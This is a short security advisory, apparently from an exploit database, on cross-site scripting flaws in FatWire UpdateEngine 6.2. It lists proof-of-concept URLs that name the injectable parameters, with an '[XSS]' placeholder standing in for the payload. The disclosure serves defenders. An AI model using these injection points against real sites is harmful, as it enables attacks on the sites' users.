exploits , vulnerabilities , articles , FatWire UpdateEngine Multiple Cross-Site Scripting Vulnerabilities

Title	FatWire UpdateEngine Multiple Cross-Site Scripting Vulnerabilities
Published	2005-12-27-12:00AM
Updated	2005-12-27-08:59PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovered by rakstija r0t3d3Vil.
Vulnerable	FatWire UpdateEngine 6.2
Not Vulnerable
Code	No exploit is required. The following proof of concept examples are available: http://www.example.com/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&PAGE_ID =FWS%5FPAGE%5F1399202&FUELAP_SITEDBID=SITE%5F%2D 66&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1404733&COUNT RY_ID=INTSITE%5F1167494&CAMPAIGN_ID=SFCAMPAIGN%5 F%2D1&COUNTRYNAME=us&SOURCEPAGE_ID=FWS%5FPAGE%5F1 415379&FUELAP_TEMPLATENAME=[XSS] http://www.example.com/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_ TEMPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_ ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402 412&EMAIL=[XSS]&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COU NTRY_ID=INTSITE%5F1167494&ERROR=error&ACTIVITY_ID =FWS%5FWHITEPAPERS%5F1300483&COUNTRYNAME=us&FUELA P_SITEDBID=SITE%5F%2D66& http://www.example.com/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TE MPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_ID= FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412& EMAIL=&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=IN TSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHIT EPAPERS%5F1300483&COUNTRYNAME=[XSS] http://www.example.com/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TE MPLATENAME=[XSS]
TXT